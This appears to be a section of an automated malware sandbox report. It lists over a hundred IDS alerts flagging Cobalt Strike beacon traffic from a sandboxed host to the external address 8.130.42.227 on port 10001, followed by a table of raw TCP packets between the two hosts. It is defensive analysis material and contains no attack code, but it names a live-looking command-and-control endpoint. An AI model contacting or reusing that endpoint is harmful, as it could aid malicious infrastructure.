                                                                2024-10-01T09:18:13.614005+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498008.130.42.22710001TCP
                                                                2024-10-01T09:18:14.684749+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498018.130.42.22710001TCP
                                                                2024-10-01T09:18:15.752081+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498028.130.42.22710001TCP
                                                                2024-10-01T09:18:16.838929+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498038.130.42.22710001TCP
                                                                2024-10-01T09:18:17.902793+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498048.130.42.22710001TCP
                                                                2024-10-01T09:18:19.022823+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498058.130.42.22710001TCP
                                                                2024-10-01T09:18:20.290340+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498068.130.42.22710001TCP
                                                                2024-10-01T09:18:21.351390+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498078.130.42.22710001TCP
                                                                2024-10-01T09:18:22.404212+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498088.130.42.22710001TCP
                                                                2024-10-01T09:18:23.470412+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498098.130.42.22710001TCP
                                                                2024-10-01T09:18:24.563314+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498108.130.42.22710001TCP
                                                                2024-10-01T09:18:25.624597+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498118.130.42.22710001TCP
                                                                2024-10-01T09:18:26.699887+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498128.130.42.22710001TCP
                                                                2024-10-01T09:18:27.768611+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498138.130.42.22710001TCP
                                                                2024-10-01T09:18:28.877591+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498148.130.42.22710001TCP
                                                                2024-10-01T09:18:29.989644+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498158.130.42.22710001TCP
                                                                2024-10-01T09:18:31.053847+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498168.130.42.22710001TCP
                                                                2024-10-01T09:18:32.116169+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498178.130.42.22710001TCP
                                                                2024-10-01T09:18:33.219289+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498188.130.42.22710001TCP
                                                                2024-10-01T09:18:34.334705+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498198.130.42.22710001TCP
                                                                2024-10-01T09:18:35.513333+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498208.130.42.22710001TCP
                                                                2024-10-01T09:18:39.577881+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498218.130.42.22710001TCP
                                                                2024-10-01T09:18:40.809481+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498228.130.42.22710001TCP
                                                                2024-10-01T09:18:41.920610+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498238.130.42.22710001TCP
                                                                2024-10-01T09:18:42.984606+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498248.130.42.22710001TCP
                                                                2024-10-01T09:18:44.063633+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498258.130.42.22710001TCP
                                                                2024-10-01T09:18:45.136440+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498268.130.42.22710001TCP
                                                                2024-10-01T09:18:46.218684+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498278.130.42.22710001TCP
                                                                2024-10-01T09:18:47.282624+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498288.130.42.22710001TCP
                                                                2024-10-01T09:18:48.375102+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498298.130.42.22710001TCP
                                                                2024-10-01T09:18:49.608325+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498308.130.42.22710001TCP
                                                                2024-10-01T09:18:50.703630+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498318.130.42.22710001TCP
                                                                2024-10-01T09:18:51.880088+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498328.130.42.22710001TCP
                                                                2024-10-01T09:18:53.537161+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498338.130.42.22710001TCP
                                                                2024-10-01T09:18:55.387877+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498348.130.42.22710001TCP
                                                                2024-10-01T09:18:56.475650+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498358.130.42.22710001TCP
                                                                2024-10-01T09:18:57.540720+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498368.130.42.22710001TCP
                                                                2024-10-01T09:18:58.616732+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498378.130.42.22710001TCP
                                                                2024-10-01T09:18:59.714059+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498388.130.42.22710001TCP
                                                                2024-10-01T09:19:00.832433+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498398.130.42.22710001TCP
                                                                2024-10-01T09:19:02.068888+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498408.130.42.22710001TCP
                                                                2024-10-01T09:19:03.153098+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498418.130.42.22710001TCP
                                                                2024-10-01T09:19:04.246598+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498428.130.42.22710001TCP
                                                                2024-10-01T09:19:05.506380+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498438.130.42.22710001TCP
                                                                2024-10-01T09:19:06.612184+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498448.130.42.22710001TCP
                                                                2024-10-01T09:19:07.716740+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498458.130.42.22710001TCP
                                                                2024-10-01T09:19:08.837611+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498468.130.42.22710001TCP
                                                                2024-10-01T09:19:09.922438+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498478.130.42.22710001TCP
                                                                2024-10-01T09:19:11.239656+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498488.130.42.22710001TCP
                                                                2024-10-01T09:19:12.386735+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498498.130.42.22710001TCP
                                                                2024-10-01T09:19:13.536698+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498508.130.42.22710001TCP
                                                                2024-10-01T09:19:14.618716+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498518.130.42.22710001TCP
                                                                2024-10-01T09:19:15.775008+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498528.130.42.22710001TCP
                                                                2024-10-01T09:19:16.917650+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498538.130.42.22710001TCP
                                                                2024-10-01T09:19:18.007050+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498548.130.42.22710001TCP
                                                                2024-10-01T09:19:19.142195+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498558.130.42.22710001TCP
                                                                2024-10-01T09:19:20.210883+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498568.130.42.22710001TCP
                                                                2024-10-01T09:19:21.334691+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498578.130.42.22710001TCP
                                                                2024-10-01T09:19:22.475180+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498588.130.42.22710001TCP
                                                                2024-10-01T09:19:23.599602+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498598.130.42.22710001TCP
                                                                2024-10-01T09:19:24.837105+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498608.130.42.22710001TCP
                                                                2024-10-01T09:19:25.934898+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498618.130.42.22710001TCP
                                                                2024-10-01T09:19:27.087377+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498628.130.42.22710001TCP
                                                                2024-10-01T09:19:28.172842+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498638.130.42.22710001TCP
                                                                2024-10-01T09:19:29.264189+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498648.130.42.22710001TCP
                                                                2024-10-01T09:19:30.316787+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498658.130.42.22710001TCP
                                                                2024-10-01T09:19:31.392561+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498668.130.42.22710001TCP
                                                                2024-10-01T09:19:32.464935+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498678.130.42.22710001TCP
                                                                2024-10-01T09:19:33.550740+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498688.130.42.22710001TCP
                                                                2024-10-01T09:19:34.630154+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498698.130.42.22710001TCP
                                                                2024-10-01T09:19:35.695994+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498708.130.42.22710001TCP
                                                                2024-10-01T09:19:36.920659+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498718.130.42.22710001TCP
                                                                2024-10-01T09:19:38.425762+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498728.130.42.22710001TCP
                                                                2024-10-01T09:19:39.518197+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498738.130.42.22710001TCP
                                                                2024-10-01T09:19:40.591060+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498748.130.42.22710001TCP
                                                                2024-10-01T09:19:42.136365+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498758.130.42.22710001TCP
                                                                2024-10-01T09:19:43.230968+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498768.130.42.22710001TCP
                                                                2024-10-01T09:19:44.304788+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498778.130.42.22710001TCP
                                                                2024-10-01T09:19:45.387293+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498788.130.42.22710001TCP
                                                                2024-10-01T09:19:46.467149+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498798.130.42.22710001TCP
                                                                2024-10-01T09:19:47.532118+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498808.130.42.22710001TCP
                                                                2024-10-01T09:19:48.616951+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498818.130.42.22710001TCP
                                                                2024-10-01T09:19:49.687932+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498828.130.42.22710001TCP
                                                                2024-10-01T09:19:50.784094+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498838.130.42.22710001TCP
                                                                2024-10-01T09:19:51.912928+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498848.130.42.22710001TCP
                                                                2024-10-01T09:19:52.973922+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498858.130.42.22710001TCP
                                                                2024-10-01T09:19:54.271035+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498868.130.42.22710001TCP
                                                                2024-10-01T09:19:58.400646+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498878.130.42.22710001TCP
                                                                2024-10-01T09:19:59.471246+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498888.130.42.22710001TCP
                                                                2024-10-01T09:20:00.548335+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498898.130.42.22710001TCP
                                                                2024-10-01T09:20:01.623607+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498908.130.42.22710001TCP
                                                                2024-10-01T09:20:02.745260+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498918.130.42.22710001TCP
                                                                2024-10-01T09:20:03.807192+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498928.130.42.22710001TCP
                                                                2024-10-01T09:20:04.885627+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498938.130.42.22710001TCP
                                                                2024-10-01T09:20:05.944846+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498948.130.42.22710001TCP
                                                                2024-10-01T09:20:07.026432+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498958.130.42.22710001TCP
                                                                2024-10-01T09:20:08.116543+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498968.130.42.22710001TCP
                                                                2024-10-01T09:20:09.189258+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498978.130.42.22710001TCP
                                                                2024-10-01T09:20:10.271995+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498988.130.42.22710001TCP
                                                                2024-10-01T09:20:11.341983+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498998.130.42.22710001TCP
                                                                2024-10-01T09:20:13.189833+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499008.130.42.22710001TCP
                                                                2024-10-01T09:20:14.262971+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499018.130.42.22710001TCP
                                                                2024-10-01T09:20:15.316609+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499028.130.42.22710001TCP
                                                                2024-10-01T09:20:16.386558+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499038.130.42.22710001TCP
                                                                2024-10-01T09:20:17.480378+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499048.130.42.22710001TCP
                                                                2024-10-01T09:20:18.554731+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499058.130.42.22710001TCP
                                                                2024-10-01T09:20:19.621581+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499068.130.42.22710001TCP
                                                                2024-10-01T09:20:21.232159+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499078.130.42.22710001TCP
                                                                2024-10-01T09:20:22.303033+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499088.130.42.22710001TCP
                                                                2024-10-01T09:20:23.376704+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499098.130.42.22710001TCP
                                                                2024-10-01T09:20:24.495821+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499108.130.42.22710001TCP
                                                                2024-10-01T09:20:25.565805+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499118.130.42.22710001TCP
                                                                2024-10-01T09:20:26.660847+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499128.130.42.22710001TCP
                                                                2024-10-01T09:20:27.739974+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499138.130.42.22710001TCP
                                                                2024-10-01T09:20:28.809816+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499148.130.42.22710001TCP
                                                                2024-10-01T09:20:29.972968+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499158.130.42.22710001TCP
                                                                2024-10-01T09:20:31.062763+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499168.130.42.22710001TCP
                                                                2024-10-01T09:20:32.150805+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499178.130.42.22710001TCP
                                                                2024-10-01T09:20:36.248804+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499188.130.42.22710001TCP
                                                                2024-10-01T09:20:37.336700+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499198.130.42.22710001TCP
                                                                2024-10-01T09:20:38.408916+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499208.130.42.22710001TCP
                                                                2024-10-01T09:20:40.072859+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499218.130.42.22710001TCP
                                                                2024-10-01T09:20:41.148707+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499228.130.42.22710001TCP
                                                                2024-10-01T09:20:42.228856+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499238.130.42.22710001TCP
                                                                2024-10-01T09:20:43.308659+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499248.130.42.22710001TCP
                                                                2024-10-01T09:20:44.388802+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499258.130.42.22710001TCP
                                                                2024-10-01T09:20:45.452971+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499268.130.42.22710001TCP
                                                                2024-10-01T09:20:46.532833+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499278.130.42.22710001TCP
                                                                2024-10-01T09:20:47.631726+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499288.130.42.22710001TCP
                                                                2024-10-01T09:20:48.726981+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499298.130.42.22710001TCP
                                                                2024-10-01T09:20:49.782566+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499308.130.42.22710001TCP
                                                                2024-10-01T09:20:50.869027+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499318.130.42.22710001TCP
                                                                2024-10-01T09:20:52.939150+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499328.130.42.22710001TCP
                                                                2024-10-01T09:20:54.010943+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499338.130.42.22710001TCP
                                                                2024-10-01T09:20:55.078196+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499348.130.42.22710001TCP
                                                                2024-10-01T09:20:56.320815+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499358.130.42.22710001TCP
                                                                2024-10-01T09:20:57.479719+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499368.130.42.22710001TCP
                                                                2024-10-01T09:20:58.539468+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499378.130.42.22710001TCP
                                                                2024-10-01T09:20:59.608844+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499388.130.42.22710001TCP
                                                                2024-10-01T09:21:00.694909+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499398.130.42.22710001TCP
                                                                2024-10-01T09:21:01.773785+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499408.130.42.22710001TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 1, 2024 09:16:57.833241940 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:57.838273048 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:57.838345051 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:57.838449955 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:57.843415976 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781096935 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781115055 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781127930 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781137943 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781150103 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781162024 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781160116 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:58.781172037 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781184912 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781199932 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781213045 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.781224012 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:58.781224966 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:58.781249046 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:58.781274080 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:58.786159992 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.786220074 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:58.786252975 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.786268950 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.786281109 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:58.786302090 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:58.786328077 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.032504082 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.032536030 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.032547951 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.032602072 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.032613039 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.032610893 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.032623053 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.032689095 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.032689095 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.033147097 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.033200026 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.033200979 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.033245087 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.033401012 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.033418894 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.033431053 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.033447027 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.033473969 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.033484936 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.033485889 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.033535004 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.033565044 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.034147978 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.034205914 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.034239054 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.034250975 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.034291029 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.034321070 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.034344912 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.034356117 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.034365892 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.034403086 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.034431934 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.035098076 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.035147905 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.035154104 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.035159111 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.035192013 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.035211086 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.035218000 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.035229921 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.035260916 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.037379026 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.037439108 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.119342089 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.119354010 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.119424105 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.291980982 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292000055 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292011023 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292021990 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292033911 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292047024 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.292049885 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292062998 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292073011 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292077065 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.292083025 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292094946 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292135000 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.292164087 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.292273998 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292325020 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292335987 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292346954 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292365074 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.292365074 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.292409897 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.292505026 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292526960 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292537928 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292617083 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.292643070 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292653084 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292665005 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292676926 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292723894 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.292757034 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292768002 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292778969 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.292799950 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.292829990 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.293421984 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.293467045 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.293478012 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.293483973 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.293510914 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.293534040 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.293540001 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.293553114 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.293562889 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.293574095 CEST10001497308.130.42.227192.168.2.4
